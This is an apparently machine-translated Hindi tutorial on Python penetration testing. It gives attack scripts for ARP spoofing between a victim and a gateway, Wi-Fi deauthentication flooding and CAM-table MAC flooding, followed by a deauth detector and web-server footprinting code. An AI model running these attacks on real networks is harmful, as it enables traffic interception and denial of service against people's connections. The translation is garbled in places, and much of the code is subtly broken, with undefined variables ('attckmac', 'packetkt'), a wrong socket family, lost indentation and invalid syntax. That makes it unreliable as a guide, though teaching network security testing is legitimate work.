इस खंड में, हम एआरपी स्पूफिंग के पायथन कार्यान्वयन को समझेंगे। इसके लिए हमें तीन मैक पते चाहिए - पहला पीड़ित का, दूसरा हमलावर का और तीसरा गेटवे का। इसके साथ ही, हमें ARP प्रोटोकॉल के कोड का भी उपयोग करना होगा।

आइए हम निम्न आवश्यक मॉड्यूलों को आयात करें -

import socket
import struct
import binascii

अब, हम एक सॉकेट बनाएंगे, जिसमें तीन पैरामीटर होंगे। पहला पैरामीटर हमें पैकेट इंटरफ़ेस के बारे में बताता है (लिनक्स विशिष्ट और विंडोज़ के लिए AF_INET) के लिए PF_PACKET), दूसरा पैरामीटर हमें बताता है कि क्या यह एक कच्चा सॉकेट है और तीसरा पैरामीटर हमें उस प्रोटोकॉल के बारे में बताता है जिसमें हम रुचि रखते हैं (यहाँ 0,00800 IP के लिए उपयोग किया जाता है) मसविदा बनाना)।

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0",socket.htons(0x0800)))

अब हम हमलावर, पीड़ित और गेटवे मशीन का मैक पता प्रदान करेंगे -

attckrmac = '\x00\x0c\x29\x4f\x8e\x76'
victimmac ='\x00\x0C\x29\x2E\x84\x5A'
gatewaymac = '\x00\x50\x56\xC0\x00\x28'

हमें एआरपी प्रोटोकॉल का कोड देने की आवश्यकता है -

code ='\x08\x06'

दो ईथरनेट पैकेट, एक पीड़ित मशीन के लिए और दूसरा गेटवे मशीन के लिए निम्नानुसार तैयार किया गया है -

ethernet1 = victimmac + attckmac + code
ethernet2 = gatewaymac +  attckmac + code

ARP हेडर के अनुसार कोड की निम्नलिखित पंक्तियाँ क्रम में हैं -

htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'

अब हमें गेटवे मशीन और पीड़ित मशीनों के आईपी पते देने की आवश्यकता है (मान लें कि हमारे पास गेटवे और पीड़ित मशीनों के लिए निम्नलिखित आईपी पते हैं) -

gateway_ip = '192.168.43.85'
victim_ip = '192.168.43.131'

उपरोक्त IP पतों को हेक्साडेसिमल फॉर्मेट की मदद से कन्वर्ट करें socket.inet_aton() तरीका।

gatewayip = socket.inet_aton ( gateway_ip )
victimip = socket.inet_aton ( victim_ip )

गेटवे मशीन के आईपी पते को बदलने के लिए कोड की निम्नलिखित पंक्ति निष्पादित करें।

victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip
gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip

while 1:
   s.send(victim_ARP)
   s.send(gateway_ARP)

काली लिनक्स पर स्केपी का उपयोग करके कार्यान्वयन

ARP स्पूफिंग को Kali Linux पर Scapy का उपयोग करके लागू किया जा सकता है। ऐसा करने के लिए इन चरणों का पालन करें -

चरण 1: हमलावर मशीन का पता

इस चरण में, हम कमांड चलाकर हमलावर मशीन का आईपी पता प्राप्त करेंगे ifconfig काली लिनक्स के कमांड प्रॉम्प्ट पर।

चरण 2: लक्ष्य मशीन का पता

इस चरण में, हम कमांड चलाकर लक्ष्य मशीन का आईपी पता प्राप्त करेंगे ifconfig काली लिनक्स के कमांड प्रॉम्प्ट पर, जिसे हमें किसी अन्य वर्चुअल मशीन पर खोलने की आवश्यकता है।

चरण 3: लक्ष्य मशीन को पिंग करें

इस चरण में, हमें निम्न आदेश की सहायता से हमलावर मशीन से लक्ष्य मशीन को पिंग करने की आवश्यकता है -

Ping –c 192.168.43.85(say IP address of target machine)

चरण 4: लक्ष्य मशीन पर एआरपी कैश

हम पहले से ही जानते हैं कि दो मशीनें मैक पते का आदान-प्रदान करने के लिए एआरपी पैकेट का उपयोग करती हैं इसलिए चरण 3 के बाद, हम एआरपी कैश को देखने के लिए लक्ष्य मशीन पर निम्न कमांड चला सकते हैं -

arp -n

चरण 5: स्कैपी का उपयोग करके एआरपी पैकेट का निर्माण

हम स्कैपी की मदद से एआरपी पैकेट बना सकते हैं -

scapy
arp_packt = ARP()
arp_packt.display()

चरण 6: स्कैपी का उपयोग करके दुर्भावनापूर्ण एआरपी पैकेट भेजना

हम स्कैपी की मदद से दुर्भावनापूर्ण एआरपी पैकेट भेज सकते हैं -

arp_packt.pdst = “192.168.43.85”(say IP address of target machine)
arp_packt.hwsrc = “11:11:11:11:11:11”
arp_packt.psrc = ”1.1.1.1”
arp_packt.hwdst = “ff:ff:ff:ff:ff:ff”
send(arp_packt)

Step 7: Again check ARP cache on target machine

अब अगर हम फिर से ARP कैश को लक्ष्य मशीन पर जाँचेंगे तो हमें नकली पता '1.1.1.1' दिखाई देगा।

वायरलेस सिस्टम बहुत लचीलेपन के साथ आते हैं लेकिन दूसरी ओर, यह गंभीर सुरक्षा मुद्दों की ओर भी ले जाता है। और, यह एक गंभीर सुरक्षा मुद्दा कैसे बन जाता है - क्योंकि हमलावर, वायरलेस कनेक्टिविटी के मामले में, केवल वायर्ड नेटवर्क के मामले में भौतिक पहुंच के बजाय आक्रमण की संकेत की उपलब्धता की आवश्यकता है। वायरलेस सिस्टम का पेनेट्रेशन परीक्षण वायर्ड नेटवर्क पर करने की तुलना में एक आसान काम है। हम वास्तव में एक वायरलेस माध्यम के खिलाफ अच्छे भौतिक सुरक्षा उपायों को लागू नहीं कर सकते हैं, अगर हम पर्याप्त रूप से स्थित हैं, तो हम सब कुछ "सुन" (या कम से कम अपने वायरलेस एडाप्टर को सुनने में सक्षम है) कर पाएंगे, जो हवा में बह रहा है।

आवश्यक शर्तें

इससे पहले कि हम वायरलेस नेटवर्क की पेन्टिंग के बारे में और अधिक सीखें, आइए हम शब्दावली और क्लाइंट और वायरलेस सिस्टम के बीच संचार की प्रक्रिया पर चर्चा करें।

महत्वपूर्ण शब्दावली

आइए अब हम वायरलेस नेटवर्क के छिद्रण से संबंधित महत्वपूर्ण शब्दावली सीखते हैं।

एक्सेस प्वाइंट (एपी)

एक पहुंच बिंदु (एपी) 802.11 वायरलेस कार्यान्वयन में केंद्रीय नोड है। इस बिंदु का उपयोग उपयोगकर्ताओं को नेटवर्क के भीतर अन्य उपयोगकर्ताओं से कनेक्ट करने के लिए किया जाता है और वायरलेस LAN (WLAN) और एक निश्चित वायर नेटवर्क के बीच परस्पर संपर्क के बिंदु के रूप में भी काम कर सकता है। WLAN में, एपी एक ऐसा स्टेशन है जो डेटा प्रसारित करता है और प्राप्त करता है।

सेवा सेट पहचानकर्ता (SSID)

यह 0-32 बाइट लंबा मानव पठनीय पाठ स्ट्रिंग है जो मूल रूप से एक वायरलेस नेटवर्क को सौंपा गया नाम है। वायरलेस नेटवर्क (वाई-फाई) पर संचार करने के लिए नेटवर्क के सभी उपकरणों को इस केस-संवेदी नाम का उपयोग करना चाहिए।

मूल सेवा सेट पहचान (BSSID)

यह वायरलेस एक्सेस प्वाइंट (एपी) पर चल रहे वाई-फाई चिपसेट का मैक एड्रेस है। यह बेतरतीब ढंग से उत्पन्न होता है।

चैनल संख्या

यह प्रसारण के लिए एक्सेस प्वाइंट (एपी) द्वारा उपयोग की जाने वाली रेडियो आवृत्ति की सीमा का प्रतिनिधित्व करता है।

क्लाइंट और वायरलेस सिस्टम के बीच संचार

एक और महत्वपूर्ण बात जो हमें समझने की जरूरत है वह है क्लाइंट और वायरलेस सिस्टम के बीच संचार की प्रक्रिया। निम्नलिखित चित्र की मदद से हम इसे समझ सकते हैं -

बीकन फ्रेम

क्लाइंट और पहुंच बिंदु के बीच संचार प्रक्रिया में, एपी समय-समय पर अपनी उपस्थिति दिखाने के लिए एक बीकन फ्रेम भेजता है। यह फ्रेम SSID, BSSID और चैनल नंबर से संबंधित जानकारी के साथ आता है।

जांच का अनुरोध

अब, क्लाइंट डिवाइस APs के लिए सीमा में जाँच करने के लिए एक जांच अनुरोध भेजेगा। जांच अनुरोध भेजने के बाद, यह एपी से जांच की प्रतिक्रिया का इंतजार करेगा। जांच अनुरोध में एसएस की जानकारी जैसे एपी, वेंडर-विशिष्ट जानकारी आदि शामिल हैं।

जांच प्रतिक्रिया

अब, जांच अनुरोध प्राप्त करने के बाद, एपी एक जांच प्रतिक्रिया भेजेगा, जिसमें समर्थित डेटा दर, क्षमता आदि जैसी जानकारी शामिल है।

प्रमाणीकरण अनुरोध

अब, क्लाइंट डिवाइस एक प्रमाणीकरण अनुरोध फ़्रेम भेजेगा जिसमें उसकी पहचान होगी।

प्रमाणीकरण प्रतिक्रिया

अब जवाब में, एपी स्वीकृति या अस्वीकृति का संकेत देते हुए एक प्रमाणीकरण प्रतिक्रिया फ्रेम भेजेगा।

एसोसिएशन का अनुरोध

प्रमाणीकरण सफल होने पर, क्लाइंट डिवाइस ने एक एसोसिएशन अनुरोध फ़्रेम भेजा है जिसमें समर्थित डेटा दर और AP का SSID है।

एसोसिएशन की प्रतिक्रिया

अब जवाब में, एपी एक एसोसिएशन प्रतिक्रिया फ्रेम भेजेगा जिसमें स्वीकृति या अस्वीकृति का संकेत होगा। स्वीकृति के मामले में क्लाइंट डिवाइस की एक एसोसिएशन आईडी बनाई जाएगी।

पायथन का उपयोग कर वायरलेस सर्विस सेट आइडेंटिफ़ायर (SSID) ढूँढना

हम SSID के बारे में कच्चे सॉकेट विधि के साथ-साथ स्केपी लाइब्रेरी का उपयोग करके जानकारी एकत्र कर सकते हैं।

कच्चे सॉकेट विधि

हम पहले ही सीख चुके हैं mon0वायरलेस पैकेट कैप्चर करता है; इसलिए, हमें मॉनिटर मोड सेट करने की आवश्यकता हैmon0। काली लिनक्स में, इसकी सहायता से किया जा सकता हैairmon-ngस्क्रिप्ट। इस स्क्रिप्ट को चलाने के बाद, यह वायरलेस कार्ड को एक नाम देगाwlan1। अब निम्नलिखित कमांड की मदद से, हमें मॉनिटर मोड को ऑन करने की आवश्यकता हैmon0 -

airmon-ng start wlan1

निम्नलिखित कच्ची गर्तिका विधि, पायथन लिपि है, जो हमें AP का SSID देगी -

सबसे पहले हमें सॉकेट मॉड्यूल आयात करने की आवश्यकता है -

import socket

अब, हम एक सॉकेट बनाएंगे जिसमें तीन पैरामीटर होंगे। पहला पैरामीटर हमें पैकेट इंटरफ़ेस (लिनक्स विशिष्ट और विंडोज़ के लिए AF_INET के लिए PF_PACKET) के बारे में बताता है, दूसरा पैरामीटर हमें बताता है कि क्या यह एक कच्चा सॉकेट है और तीसरा पैरामीटर हमें बताता है कि हम सभी पैकेटों में रुचि रखते हैं।

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0003))

अब, अगली पंक्ति बाँध देगी mon0 मोड और 0x0003

s.bind(("mon0", 0x0003))

अब, हमें एक खाली सूची घोषित करने की आवश्यकता है, जो कि SSID of APs को संग्रहीत करेगा।

ap_list = []

अब, हमें कॉल करने की आवश्यकता है recvfrom()पैकेट प्राप्त करने की विधि। जारी रखने के लिए सूँघने के लिए, हम लूप करते समय अनंत का उपयोग करेंगे।

while True:
   packet = s.recvfrom(2048)

कोड की अगली पंक्ति से पता चलता है कि फ्रेम 8 बिट्स का है जो बीकन फ्रेम को दर्शाता है।

if packet[26] == "\x80" :
   if packetkt[36:42] not in ap_list and ord(packetkt[63]) > 0:
      ap_list.add(packetkt[36:42])
      
print("SSID:",(pkt[64:64+ord(pkt[63])],pkt[36:42].encode('hex')))

SSID स्फीफर के साथ स्निफर

स्केपी सबसे अच्छे पुस्तकालयों में से एक है जो हमें आसानी से वाई-फाई पैकेट सूँघने की अनुमति दे सकता है। आप विस्तार से स्कैपी सीख सकते हैंhttps://scapy.readthedocs.io/en/latest/। शुरू करने के लिए, सैकपी को इंटरएक्टिव मोड में चलाएं और iface का मान प्राप्त करने के लिए कमांड मान का उपयोग करें। डिफ़ॉल्ट इंटरफ़ेस eth0 है। अब जैसा कि हमारे ऊपर गुंबद है, हमें इस मोड को mon0 में बदलने की आवश्यकता है। इसे निम्नानुसार किया जा सकता है -

>>> conf.iface = "mon0"
>>> packets = sniff(count = 3)
>>> packets

<Sniffed: TCP:0 UDP:0 ICMP:0 Other:5>
>>> len(packets)
3

आइए अब हम स्केपी को एक पुस्तकालय के रूप में आयात करते हैं। इसके अलावा, निम्नलिखित पायथन लिपि का निष्पादन हमें SSID देगा -

from scapy.all import *

अब, हमें एक खाली सूची घोषित करने की आवश्यकता है जो SSID के APs को संग्रहीत करेगा।

ap_list = []

अब हम नाम के एक फंक्शन को परिभाषित करने जा रहे हैं Packet_info(), जिसमें पूरा पैकेट पार्सिंग लॉजिक होगा। इसमें तर्क pkt होगा।

def Packet_info(pkt) :

अगले कथन में, हम एक फ़िल्टर लागू करेंगे जो केवल पास होगा Dot11यातायात जिसका अर्थ है 802.11 यातायात। अनुसरण करने वाली रेखा भी एक फिल्टर है, जो ट्रैफ़िक वाले फ़्रेम टाइप 0 (प्रबंधन फ़्रेम का प्रतिनिधित्व करता है) और फ़्रेम सबटाइप 8 है (बीकन फ़्रेम का प्रतिनिधित्व करता है) से गुजरता है।

if pkt.haslayer(Dot11) :
   if ((pkt.type == 0) & (pkt.subtype == 8)) :
      if pkt.addr2 not in ap_list :
         ap_list.append(pkt.addr2)
         print("SSID:", (pkt.addr2, pkt.info))

अब, सूंघने का कार्य डेटा को सूँघ लेगा iface मूल्य mon0 (वायरलेस पैकेट के लिए) और आह्वान किया Packet_info समारोह।

sniff(iface = "mon0", prn = Packet_info)

उपरोक्त पायथन लिपियों को लागू करने के लिए, हमें वाई-फाई कार्ड की आवश्यकता होती है जो मॉनिटर मोड का उपयोग करके हवा को सूँघने में सक्षम है।

एक्सेस प्वाइंट ग्राहकों का पता लगाना

एक्सेस पॉइंट के क्लाइंट का पता लगाने के लिए, हमें जांच अनुरोध फ़्रेम पर कब्जा करने की आवश्यकता है। हम इसे वैसे ही कर सकते हैं जैसे हमने स्काईथेरेपी का उपयोग करते हुए SSID स्निफर के लिए पायथन स्क्रिप्ट में किया है। हमें देने की जरूरत हैDot11ProbeReqजांच अनुरोध फ्रेम पर कब्जा करने के लिए। पहुंच बिंदुओं के ग्राहकों का पता लगाने के लिए पायथन लिपि निम्नलिखित है -

from scapy.all import *

probe_list = []

ap_name= input(“Enter the name of access point”)

def Probe_info(pkt) :
   if pkt.haslayer(Dot11ProbeReq) :
      client_name = pkt.info
      
      if client_name == ap_name :
         if pkt.addr2 not in Probe_info:
            Print(“New Probe request--”, client_name)
            Print(“MAC is --”, pkt.addr2)
            Probe_list.append(pkt.addr2)
            
sniff(iface = "mon0", prn = Probe_info)

वायरलेस हमलों

एक पंचकोण के दृष्टिकोण से, यह समझना बहुत महत्वपूर्ण है कि वायरलेस हमला कैसे होता है। इस भाग में, हम दो प्रकार के वायरलेस हमलों पर चर्चा करेंगे -

  • डी-ऑथेंटिकेशन (डेथ) हमले

  • मैक बाढ़ हमला

डी-ऑथेंटिकेशन (डेथ) हमले

क्लाइंट डिवाइस और एक एक्सेस प्वाइंट के बीच संचार प्रक्रिया में जब भी कोई ग्राहक डिस्कनेक्ट करना चाहता है, तो उसे डी-प्रमाणीकरण फ्रेम भेजने की आवश्यकता होती है। क्लाइंट से उस फ्रेम के जवाब में, एपी डी-ऑथेंटिकेशन फ्रेम भी भेजेगा। एक हमलावर को पीड़ित के मैक पते को खराब करके और डी-प्रमाणीकरण फ्रेम को एपी को भेजकर इस सामान्य प्रक्रिया से लाभ प्राप्त किया जा सकता है। इसके कारण क्लाइंट और एपी के बीच संबंध गिरा दिया जाता है। डी-प्रमाणीकरण हमले को अंजाम देने के लिए पायथन लिपि निम्नलिखित है -

आइए, हम स्काईपी को पहले एक पुस्तकालय के रूप में आयात करें

from scapy.all import *
import sys

निम्नलिखित दो कथन क्रमशः एपी और पीड़ित के मैक पते को इनपुट करेंगे।

BSSID = input("Enter MAC address of the Access Point:- ")
vctm_mac = input("Enter MAC address of the Victim:- ")

अब, हमें डी-प्रमाणीकरण फ्रेम बनाने की आवश्यकता है। यह निम्नलिखित कथन को निष्पादित करके बनाया जा सकता है।

frame = RadioTap()/ Dot11(addr1 = vctm_mac, addr2 = BSSID, addr3 = BSSID)/ Dot11Deauth()

कोड की अगली पंक्ति भेजे गए पैकेटों की कुल संख्या का प्रतिनिधित्व करती है; यहाँ यह 500 और दो पैकेट के बीच का अंतराल है।

sendp(frame, iface = "mon0", count = 500, inter = .1)

उत्पादन

निष्पादन के बाद, उपरोक्त आदेश निम्नलिखित आउटपुट उत्पन्न करता है -

Enter MAC address of the Access Point:- (Here, we need to provide the MAC address of AP)
Enter MAC address of the Victim:- (Here, we need to provide the MAC address of the victim)

इसके बाद डेथ फ्रेम का निर्माण होता है, जिसे ग्राहक की ओर से एक्सेस प्वाइंट पर भेजा जाता है। इससे उनके बीच का कनेक्शन रद्द हो जाएगा।

यहां सवाल यह है कि हम पायथन लिपि के साथ बहरे हमले का पता कैसे लगाते हैं। निम्नलिखित पायथन लिपि के निष्पादन से ऐसे हमलों का पता लगाने में मदद मिलेगी -

from scapy.all import *
i = 1

def deauth_frame(pkt):
   if pkt.haslayer(Dot11):
      if ((pkt.type == 0) & (pkt.subtype == 12)):
         global i
         print ("Deauth frame detected: ", i)
         i = i + 1
   sniff(iface = "mon0", prn = deauth_frame)

उपरोक्त लिपि में, कथन pkt.subtype == 12 डेथ फ्रेम और वैरिएबल I को दर्शाता है जो विश्व स्तर पर परिभाषित है पैकेट की संख्या के बारे में बताता है।

उत्पादन

उपरोक्त स्क्रिप्ट का निष्पादन निम्नलिखित आउटपुट उत्पन्न करता है -

Deauth frame detected: 1
Deauth frame detected: 2
Deauth frame detected: 3
Deauth frame detected: 4
Deauth frame detected: 5
Deauth frame detected: 6

मैक पते बाढ़ हमलों

मैक एड्रेस फ्लड अटैक (सीएएम टेबल फ्लडिंग अटैक) एक प्रकार का नेटवर्क अटैक है, जिसमें एक स्विच पोर्ट से जुड़ा एक हमलावर अलग-अलग नकली सोर्स मैक एड्रेस के साथ बहुत बड़ी संख्या में ईथरनेट फ्रेम के साथ स्विच इंटरफेस को फ्लड करता है। सीएएम टेबल ओवरफ्लो तब होता है जब मैक पतों की एक बाढ़ तालिका में भर जाती है और सीएएम टेबल दहलीज तक पहुंच जाती है। यह स्विच को हब की तरह काम करने का कारण बनता है, जिससे सभी बंदरगाहों पर यातायात के साथ नेटवर्क में बाढ़ आ जाती है। ऐसे हमलों को लॉन्च करना बहुत आसान है। निम्नलिखित पायथन लिपि ऐसे सीएएम बाढ़ के हमले को शुरू करने में मदद करती है -

from scapy.all import *

def generate_packets():
packet_list = []
for i in xrange(1,1000):
packet = Ether(src = RandMAC(), dst = RandMAC())/IP(src = RandIP(), dst = RandIP())
packet_list.append(packet)
return packet_list

def cam_overflow(packet_list):
   sendp(packet_list, iface='wlan')

if __name__ == '__main__':
   packet_list = generate_packets()
   cam_overflow(packet_list)

इस तरह के हमले का मुख्य उद्देश्य स्विच की सुरक्षा की जांच करना है। अगर मैक बाढ़ के हमले के प्रभाव को कम करना चाहते हैं तो हमें पोर्ट सुरक्षा का उपयोग करने की आवश्यकता है।

वेब एप्लिकेशन और वेब सर्वर हमारी ऑनलाइन उपस्थिति के लिए महत्वपूर्ण हैं और उन पर किए गए हमले इंटरनेट पर किए गए कुल हमलों के 70% से अधिक का गठन करते हैं। ये हमले विश्वसनीय वेबसाइटों को दुर्भावनापूर्ण में बदलने का प्रयास करते हैं। इस कारण से, वेब सर्वर और वेब एप्लिकेशन पेन परीक्षण एक महत्वपूर्ण भूमिका निभाता है।

वेब सर्वर का फुट प्रिंटिंग

हमें वेब सर्वर की सुरक्षा पर विचार करने की आवश्यकता क्यों है? ऐसा इसलिए है क्योंकि ई-कॉमर्स उद्योग के तेजी से विकास के साथ, हमलावरों का मुख्य लक्ष्य वेब सर्वर है। वेब सर्वर पंचिंग के लिए, हमें वेब सर्वर, उसके होस्टिंग सॉफ़्टवेयर और ऑपरेटिंग सिस्टम के साथ-साथ अनुप्रयोगों के बारे में पता होना चाहिए, जो उन पर चल रहे हैं। वेब सर्वर के बारे में ऐसी जानकारी इकट्ठा करना वेब सर्वर के फुटप्रिंटिंग कहलाता है।

हमारे बाद के अनुभाग में, हम एक वेब सर्वर के फुटप्रिंटिंग के लिए विभिन्न तरीकों पर चर्चा करेंगे।

वेब सर्वर के फुटप्रिंटिंग के तरीके

वेब सर्वर सर्वर सॉफ़्टवेयर या हार्डवेयर हैं जो अनुरोधों को संभालने और प्रतिक्रियाओं की सेवा के लिए समर्पित हैं। वेब सर्वरों की पैठ परीक्षण करते समय ध्यान केंद्रित करने के लिए एक पेंटर के लिए यह एक महत्वपूर्ण क्षेत्र है।

आइए अब कुछ तरीकों पर चर्चा करते हैं, जिन्हें पायथन में कार्यान्वित किया जाता है, जिसे वेब सर्वर के फुटप्रिंटिंग के लिए निष्पादित किया जा सकता है -

HTTP तरीकों की उपलब्धता की जाँच

एक प्रवेश परीक्षक के लिए एक बहुत अच्छा अभ्यास विभिन्न उपलब्ध HTTP विधियों को सूचीबद्ध करके शुरू करना है। निम्नलिखित एक पायथन स्क्रिप्ट है, जिसकी सहायता से हम लक्ष्य वेब सर्वर से जुड़ सकते हैं और उपलब्ध HTTP विधियों की गणना कर सकते हैं -

शुरू करने के लिए, हमें अनुरोध पुस्तकालय आयात करने की आवश्यकता है -

import requests

अनुरोध लाइब्रेरी आयात करने के बाद, HTTP तरीकों की एक सरणी बनाएं, जिसे हम भेजने जा रहे हैं। हम कुछ मानक विधियों जैसे 'GET', 'POST', 'PUT', 'DELETE', 'विकल्प' और एक गैर-मानक विधि 'TEST' का उपयोग यह जांचने के लिए करेंगे कि वेब सर्वर अप्रत्याशित इनपुट को कैसे संभाल सकता है।

method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']

कोड की निम्नलिखित पंक्ति स्क्रिप्ट का मुख्य लूप है, जो वेब सर्वर पर HTTP पैकेट भेजेगा और विधि और स्थिति कोड प्रिंट करेगा।

for method in method_list:
   req = requests.request(method, 'Enter the URL’)
   print (method, req.status_code, req.reason)

अगली पंक्ति TRACE विधि भेजकर क्रॉस साइट ट्रेसिंग (XST) की संभावना के लिए परीक्षण करेगी।

if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
   print ('Cross Site Tracing(XST) is possible')

किसी विशेष वेब सर्वर के लिए उपरोक्त स्क्रिप्ट चलाने के बाद, हमें वेब सर्वर द्वारा स्वीकृत किसी विशेष विधि के लिए 200 ओके प्रतिक्रियाएं मिलेंगी। यदि वेब सर्वर स्पष्ट रूप से विधि से इनकार करता है तो हमें 403 निषिद्ध प्रतिक्रिया मिलेगी। एक बार जब हम क्रॉस साइट ट्रेसिंग (XST) के परीक्षण के लिए TRACE विधि भेजते हैं, तो हम प्राप्त करेंगे405 Not Allowed वेब सर्वर से प्रतिक्रियाएं अन्यथा हमें संदेश मिलेगा ‘Cross Site Tracing(XST) is possible’

HTTP हेडर की जाँच करके फुट प्रिंटिंग

HTTP हेडर वेब सर्वर से अनुरोधों और प्रतिक्रियाओं दोनों में पाए जाते हैं। वे सर्वरों के बारे में भी बहुत महत्वपूर्ण जानकारी रखते हैं। यही कारण है कि पैठ परीक्षक हमेशा HTTP हेडर के माध्यम से जानकारी पार्स करने में रुचि रखता है। वेब सर्वर के शीर्षकों के बारे में जानकारी प्राप्त करने के लिए पायथन लिपि निम्नलिखित है -

शुरू करने के लिए, हमें पुस्तकालय का आयात करने दें -

import requests

हमें वेब सर्वर पर GET अनुरोध भेजने की आवश्यकता है। कोड की निम्न पंक्ति अनुरोध लाइब्रेरी के माध्यम से एक सरल GET अनुरोध बनाती है।

request = requests.get('enter the URL')

अगला, हम उन शीर्ष लेखों की एक सूची तैयार करेंगे जिनके बारे में आपको जानकारी चाहिए।

header_list = [
   'Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', ‘Connection’, ‘Content-Length’]

अगला एक कोशिश है और ब्लॉक को छोड़कर।

for header in header_list:
   try:
      result = request.header_list[header]
      print ('%s: %s' % (header, result))
   except Exception as err:
      print ('%s: No Details Found' % header)

किसी विशेष वेब सर्वर के लिए उपरोक्त स्क्रिप्ट चलाने के बाद, हम हेडर सूची में दिए गए हेडर के बारे में जानकारी प्राप्त करेंगे। यदि किसी विशेष हेडर के लिए कोई जानकारी नहीं होगी तो यह 'नो डिटेल्स फाउंड' संदेश देगा। आप लिंक से HTTP_header फ़ील्ड के बारे में और भी जान सकते हैं -https://www.tutorialspoint.com/http/http_header_fields.htm।

असुरक्षित वेब सर्वर कॉन्फ़िगरेशन का परीक्षण

असुरक्षित वेब सर्वर कॉन्फ़िगरेशन का परीक्षण करने के लिए हम HTTP हेडर जानकारी का उपयोग कर सकते हैं। निम्नलिखित पायथन लिपि में, हम कोशिश कर रहे हैं कि एक पाठ फ़ाइल नाम में सहेजे गए URL की संख्या के लिए असुरक्षित वेब सर्वर हेडर का परीक्षण करने के लिए ब्लॉक को छोड़कर / उपयोग करें।websites.txt -

import requests
urls = open("websites.txt", "r")

for url in urls:
   url = url.strip()
   req = requests.get(url)
   print (url, 'report:')
   
   try:
      protection_xss = req.headers['X-XSS-Protection']
      if protection_xss != '1; mode = block':
      print ('X-XSS-Protection not set properly, it may be possible:', protection_xss)
   except:
      print ('X-XSS-Protection not set, it may be possible')
      
   try:
      options_content_type = req.headers['X-Content-Type-Options']
      if options_content_type != 'nosniff':
      print ('X-Content-Type-Options not set properly:', options_content_type)
   except:
      print ('X-Content-Type-Options not set')
      
   try:
      transport_security = req.headers['Strict-Transport-Security']
   except:
      print ('HSTS header not set properly, Man in the middle attacks is possible')
      
   try:
      content_security = req.headers['Content-Security-Policy']
      print ('Content-Security-Policy set:', content_security)
   except:
      print ('Content-Security-Policy missing')

एक वेब अनुप्रयोग के Footprinting

हमारे पिछले अनुभाग में, हमने एक वेब सर्वर के फुटप्रिंटिंग पर चर्चा की। इसी तरह, एक वेब एप्लिकेशन के फुटप्रिंटिंग को एक पैठ परीक्षक के दृष्टिकोण से भी महत्वपूर्ण माना जाता है।

हमारे बाद के अनुभाग में, हम एक वेब एप्लिकेशन के फुटप्रिंटिंग के विभिन्न तरीकों के बारे में जानेंगे।

एक वेब अनुप्रयोग के Footprinting के लिए तरीके

वेब एप्लिकेशन एक क्लाइंट-सर्वर प्रोग्राम है, जो क्लाइंट द्वारा वेब सर्वर में चलाया जाता है। वेब एप्लिकेशन की पैठ परीक्षण करते समय ध्यान केंद्रित करने के लिए एक पेंटर के लिए यह एक और महत्वपूर्ण क्षेत्र है।

आइए अब हम पायथन में कार्यान्वित विभिन्न विधियों पर चर्चा करते हैं, जिनका उपयोग किसी वेब एप्लिकेशन के फुटप्रिंटिंग के लिए किया जा सकता है -

पार्सर ब्यूटीफुल का उपयोग करके जानकारी इकट्ठा करना

मान लीजिए हम एक वेब पेज से सभी हाइपरलिंक एकत्र करना चाहते हैं; हम एक पार्सर का उपयोग कर सकते हैं जिसे ब्यूटीसैप कहा जाता है। HTML और XML फ़ाइलों से डेटा खींचने के लिए पार्सर एक पायथन लाइब्रेरी है। इसके साथ प्रयोग किया जा सकता हैurlib क्योंकि इसे एक सूप ऑब्जेक्ट बनाने के लिए एक इनपुट (डॉक्यूमेंट या यूआरएल) की आवश्यकता होती है और यह वेब पेज को खुद से नहीं ला सकता है।

शुरू करने के लिए, हमें आवश्यक पैकेजों को आयात करना चाहिए। हम urlib और आयात करेंगेBeautifulSoup। ब्यूटीफुल आयात करने से पहले याद रखें, हमें इसे स्थापित करने की आवश्यकता है।

import urllib
from bs4 import BeautifulSoup

नीचे दी गई पायथन लिपि वेब पेज और हाइपरलिंक के शीर्षक को इकट्ठा करेगी -

अब, हमें एक वैरिएबल की जरूरत है, जो वेबसाइट के URL को स्टोर कर सके। यहां, हम 'url' नामक एक चर का उपयोग करेंगे। हम भी उपयोग करेंगेpage.read() फ़ंक्शन जो वेब पेज को स्टोर कर सकता है और वेब पेज को वेरिएबल में असाइन कर सकता है html_page

url = raw_input("Enter the URL ")
page = urllib.urlopen(url)
html_page = page.read()

html_page सूप वस्तु बनाने के लिए एक इनपुट के रूप में सौंपा जाएगा।

soup_object = BeautifulSoup(html_page)

निम्नलिखित दो पंक्तियाँ क्रमशः टैग और बिना टैग वाले शीर्षक नाम को प्रिंट करेंगी।

print soup_object.title
print soup_object.title.text

नीचे दिखाए गए कोड की लाइन सभी हाइपरलिंक को बचाएगी।

for link in soup_object.find_all('a'):
   print(link.get('href'))

बैनर हथियाने वाला

बैनर एक पाठ संदेश की तरह है जिसमें सर्वर के बारे में जानकारी होती है और बैनर हथियाने की प्रक्रिया उस बैनर द्वारा प्रदान की गई जानकारी को लाने की प्रक्रिया है। अब, हमें यह जानना होगा कि यह बैनर कैसे बना है। यह पैकेट के हेडर द्वारा उत्पन्न होता है जिसे भेजा जाता है। और जब क्लाइंट पोर्ट से कनेक्ट करने का प्रयास करता है, तो सर्वर प्रतिक्रिया करता है क्योंकि हेडर में सर्वर के बारे में जानकारी होती है।

निम्नलिखित पायथन स्क्रिप्ट सॉकेट प्रोग्रामिंग का उपयोग करके बैनर को हथियाने में मदद करती है -

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))

targethost = str(raw_input("Enter the host name: "))
targetport = int(raw_input("Enter Port: "))
s.connect((targethost,targetport))

def garb(s:)
   try:
      s.send('GET HTTP/1.1 \r\n')
      ret = sock.recv(1024)
      print ('[+]' + str(ret))
      return
   except Exception as error:
      print ('[-]' Not information grabbed:' + str(error))
      return

उपरोक्त स्क्रिप्ट को चलाने के बाद, हम हेडर के बारे में उसी तरह की जानकारी प्राप्त करेंगे जैसे हमें पिछले अनुभाग में HTTP हेडर के पायथन की पायथन स्क्रिप्ट से मिली थी।

